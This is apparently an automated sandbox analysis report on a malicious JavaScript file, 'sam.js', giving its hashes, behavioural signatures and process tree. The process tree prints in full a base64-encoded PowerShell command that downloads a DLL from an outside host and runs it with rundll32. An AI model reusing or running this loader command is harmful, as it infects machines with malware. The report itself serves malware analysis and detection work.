Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
14/03/2023, 19:41
Static task
static1
Behavioral task
behavioral1
Sample
sam.js
Resource
win7-20230220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
sam.js
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
sam.js
-
Size
39KB
-
MD5
a480fe34e87362b9df6959a8a068e54d
-
SHA1
75e6c269fe54217fd29d02e02ce5bb8266b31d77
-
SHA256
efc4f3ad9b70627b7f238b936eae68e506a3368b362b7700ceae21221642e12e
-
SHA512
a5c81f28223a10e80eb8416327e976bb8e6777cf384ca88b0149b9b2833e004d7f571ebb8c82c81eae5704ef7198a2c6f10a59db23e5903c3bdca3d956fe13fd
-
SSDEEP
768:vTWqH5R2pmRawgJI1/ZsLqZhLYhHe9+M/sRwyWwlzD4tb2wyg6wZ0ocuEOp4e/dn:DH56qXfqNOyJM
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1980 powershell.exe 1980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1980 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1192 wrote to memory of 1980 1192 wscript.exe 28 PID 1192 wrote to memory of 1980 1192 wscript.exe 28 PID 1192 wrote to memory of 1980 1192 wscript.exe 28 PID 1980 wrote to memory of 568 1980 powershell.exe 30 PID 1980 wrote to memory of 568 1980 powershell.exe 30 PID 1980 wrote to memory of 568 1980 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\sam.js1⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwB0AGUAYwBuAG8AbABhAHAAdABvAHAAcwAuAGMAbwBtAC8AZAA3AFIATABoAGsALwB0ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABJAHMAbwBoAGUAcwBwAGUAcgBpAGQAaQBuAC4AZABsAGwAOwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwASQBzAG8AaABlAHMAcABlAHIAaQBkAGkAbgAuAGQAbABsACwAWABTADgAOAA7AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\Isohesperidin.dll XS883⤵PID:568
-
-